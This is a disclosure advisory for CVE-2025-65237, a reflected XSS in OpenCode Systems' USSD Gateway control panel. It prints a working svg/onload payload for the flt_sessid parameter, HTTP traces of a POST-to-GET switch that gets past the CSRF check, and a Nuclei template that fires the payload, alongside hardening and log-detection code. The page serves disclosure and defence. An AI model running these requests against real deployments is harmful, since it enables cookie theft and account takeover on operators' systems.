[CVE-2025-65237] USSD Gateway Reflected Cross-Site Scripting
Technical information about CVE-2025-65237 in the OpenCode USSD GW application.
Description
Reflected Cross-Site Scripting in the USSD Gateway application offered by OpenCode Systems allows a user who has access to the vulnerable function to execute JavaScript code against a victim.
Application Details
Name: USSD Gateway
Vendor: OpenCode Systems
Version: OC Release 5 - Version 6.13.11
Technical Details
Vulnerable Endpoint:
/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a
Vulnerable Parameter:
flt_sessid
Payload Sample:
flt_sessid=6"><svg/onload=alert("poc%20XSS")>
Exploitation
This vulnerability is a chain of two issues that turns a self-XSS into a reflected XSS. The server assigns cookies to the user after login without setting the SameSite attribute to Lax, which allows the attacker to convert the request from POST to GET and thereby bypass the CSRF verification parameter carried in the POST body.
The original request carries the vulnerable parameter in the POST body, together with the CSRF verification parameter.
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]
_csrf=t_OoX[...]3D%3D&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]
HTTP/2 200 OK
[...]
Content-Length: 22712
Content-Type: text/html; charset=utf-8
[...]
<TD align=right class=txt_small7 width=100><B>Session ID</B>: </td>
<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6" size=10></td>
</tr>
<tr>
<TD align=right class=txt_small7 width=100><B>User ID</B>: </td>
[...]
An attempt was made to remove the CSRF verification parameter's value, or the whole parameter, because at this point the issue is still a self-XSS and cannot be shared with other users; the server rejected the request as shown below.
POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
[...]
_csrf=&display=1&flt_sessid=6&flt_user=&flt_server_node=[...]
HTTP/2 400 Bad Request
Content-Length: 18611
Content-Type: text/html; charset=utf-8
[...]
[...]
<div class="alert alert-danger" role="alert">
<h4>Error 400</h4>
<hr>
<h4 class="alert-heading">
Unable to verify your data submission.
</h4>
<p class="mb-0 error-description">
Unfortunately we're having trouble loading the page you are looking for. Please use the actions below.
</p>
</div>
[...]
It was noticed that the server assigns cookies to the user without adding the Lax value for the SameSite attribute. This allows us to convert the request from POST to GET and remove the CSRF verification parameter, producing a vulnerable URL that can be shared with other users.
For more information about the SameSite values and bypasses, see the following labs: https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions
By changing the request from POST to GET, removing the CSRF verification parameter's value (or even the whole parameter) and sending it again, the server accepted the request and the vulnerable parameter's value is reflected in the response.
GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6"><svg/onload=alert("poc%20XSS")>&flt_user=&flt_server_node=[...] HTTP/2
Host: REDACTED
Cookie: openid-state=c2b8133[...]lVtEIc%22%3B%7D; OCPANEL-SESSIONID=1hjg[...]fv6o; _csrf=a15d2cf80[...]yIBz%22%3B%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
[...]
HTTP/2 200 OK
Content-Length: 22749
Content-Type: text/html; charset=utf-8
[...]
[...]
<td class=txt_small7><input type=text name=flt_sessid class="txt frmtxt" value="6"><svg/onload=alert(document.cookie)>" size=10></td>
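The two weaknesses the exploitation chain relies on (the filter value is reflected into an HTML attribute without encoding, and the CSRF token is only verified for POST bodies while the session cookie carries no SameSite attribute) each have a small, well-known fix. The following is an added hardening sketch, not OpenCode's code; the function names are hypothetical, the session-id format is not known from the advisory, and the only page-derived values are the payload, the cookie name and the `flt_sessid`/`_csrf` parameter names.

```python
"""Added hardening sketch for the two weaknesses described above (constructed
example, not OpenCode's code): HTML-escape the reflected filter value, verify
the CSRF token on every request that reaches the handler regardless of method,
and set SameSite on the session cookie.  Function names are hypothetical."""
import hmac
import html
import re
from urllib.parse import parse_qs

# The sample payload from the advisory (URL-decoded form).
PAYLOAD = '6"><svg/onload=alert("poc XSS")>'


def render_session_filter(flt_sessid: str, escape: bool = True) -> str:
    """Build the <input> the control panel reflects the filter value into.
    escape=False reproduces the vulnerable behaviour for comparison."""
    value = html.escape(flt_sessid, quote=True) if escape else flt_sessid
    return f'<input type=text name=flt_sessid class="txt frmtxt" value="{value}" size=10>'


# Any tag other than the <input> we emit ourselves.
_FOREIGN_TAG_RE = re.compile(r"<(?!/?input\b)[A-Za-z]")


def reflects_unescaped(fragment: str) -> bool:
    """True when the filter value broke out of the attribute and introduced a tag."""
    return _FOREIGN_TAG_RE.search(fragment) is not None


def verify_csrf(method: str, query: str, body: str, session_token: str) -> bool:
    """Verify the anti-CSRF token wherever the filter parameters arrive: the query
    string for GET or the form body for POST.  The vulnerable server only checked
    the token on POST bodies, so a GET with an empty _csrf slipped through."""
    params = parse_qs(query if method == "GET" else body, keep_blank_values=True)
    submitted = params.get("_csrf", [""])[0]
    if not submitted:  # an empty or missing token is never acceptable
        return False
    # Constant-time comparison; encode so non-ASCII input cannot raise.
    return hmac.compare_digest(submitted.encode(), session_token.encode())


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie header carrying the SameSite attribute the advisory found missing,
    plus Secure and HttpOnly."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def cookie_has_samesite(set_cookie: str) -> bool:
    """Check an existing Set-Cookie header value for a SameSite attribute."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return any(a.startswith("samesite=") for a in attrs)


if __name__ == "__main__":
    print("vulnerable:", render_session_filter(PAYLOAD, escape=False))
    print("hardened:  ", render_session_filter(PAYLOAD))
    print("GET with empty _csrf accepted?", verify_csrf("GET", "_csrf=&flt_sessid=6", "", "tok"))
    print(session_cookie("OCPANEL-SESSIONID", "EXAMPLE"))
```

Escaping the value with `quote=True` is what keeps the `"` and `>` of the payload inside the attribute; checking the token for GET as well as POST removes the method-switch bypass, and SameSite=Lax on the cookie is the attribute the advisory notes is absent. Note that SameSite alone is not a substitute for the token check, since Lax still sends cookies on top-level GET navigations.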
[...]
Nuclei Template
You can use this template for easy detection.
id: ocpanel-ussdgw-xss
info:
  name: USSD Gateway OCP Control Panel Reflected XSS
  author: Eslam Ali Akl @eslam3kl
  severity: Medium
  description: |
    Reflected XSS test for the OCP Control Panel USSD Gateway session listing.
    Injects a simple XSS payload into the flt_sessid parameter and flags
    the target if the payload is reflected unescaped in the HTML response.
  tags: [xss, reflected, ocpanel, ussdgw]
requests:
  - id: reflected_xss
    method: GET
    path:
      - "{{BaseURL}}/occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6%22%3E%3Csvg/onload=alert(document.cookie)%3E&flt_user=&flt_server_node="
    headers:
      User-Agent: "nuclei-scan"
      Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
      Cookie: "{{cookie}}"
    # require all matchers; nuclei's default condition is "or", which would match any 200 response
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "<svg/onload=alert\\("
      - type: word
        words:
          - "alert(document.cookie)"
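The template above is an active check. For passive detection in web-server access logs, the same attack URL has a recognisable shape: a GET to the session-listing action whose `flt_sessid` carries markup rather than a session id. The following is an added example, not part of the advisory or the vendor's tooling; the log lines are constructed in combined log format with the host redacted as in the advisory, and the assumption that legitimate session ids are numeric is taken only from the value `6` shown on this page.

```python
"""Added passive detection over access logs (constructed example, not from the
advisory): flag GET requests to the session-listing action whose flt_sessid is
not a plain session id.  SAMPLE_LOG is constructed; the numeric-session-id rule
is an assumption based on the value "6" used in the advisory."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format lines (host redacted, as in the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Nov/2025:10:01:02 +0000] "POST /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a HTTP/2.0" 200 22712 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Nov/2025:10:01:09 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6&flt_user= HTTP/2.0" 200 22712 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Nov/2025:10:02:31 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&_csrf=&display=1&flt_sessid=6%22%3E%3Csvg/onload=alert(document.cookie)%3E&flt_user= HTTP/2.0" 200 22749 "-" "nuclei-scan"
10.0.0.9 - - [12/Nov/2025:10:02:40 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&m=sessions&a=list_sessions_a&flt_sessid=6%3Cscript%3E HTTP/2.0" 200 22749 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Assumption: legitimate session ids are numeric (the advisory only shows "6").
SESSION_ID_RE = re.compile(r"^[0-9]*$")
ENDPOINT_PATH = "/occontrolpanel/index.php"
ENDPOINT_ACTION = "list_sessions_a"


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes, so %22%3E%3C become the literal characters.
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def is_suspicious(entry):
    """Return a reason string when the entry looks like the advisory's attack URL."""
    if entry is None or entry["path"] != ENDPOINT_PATH:
        return None
    q = entry["query"]
    if q.get("a", [""])[0] != ENDPOINT_ACTION:
        return None
    if entry["method"] != "GET":
        return None  # the CSRF-protected POST form is the normal path
    sessid = q.get("flt_sessid", [""])[0]
    # High confidence: markup characters can never be part of a session id.
    if any(c in sessid for c in "<>\"'"):
        return "markup characters in flt_sessid via GET: %r" % sessid
    # Lower confidence, rests on the numeric-id assumption above.
    if not SESSION_ID_RE.match(sessid):
        return "non-numeric flt_sessid via GET: %r" % sessid
    return None


def scan(log_text):
    """Return (ip, timestamp, reason) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        reason = is_suspicious(entry)
        if reason:
            hits.append((entry["ip"], entry["ts"], reason))
    return hits


if __name__ == "__main__":
    for ip, ts, reason in scan(SAMPLE_LOG):
        print(ip, ts, reason)
```

Matching on the decoded parameter rather than on the raw request line keeps the rule indifferent to the `%22%3E%3C` encoding used by the template versus a browser's own encoding; the benign `flt_sessid=6` request is not flagged, while both encoded payloads are.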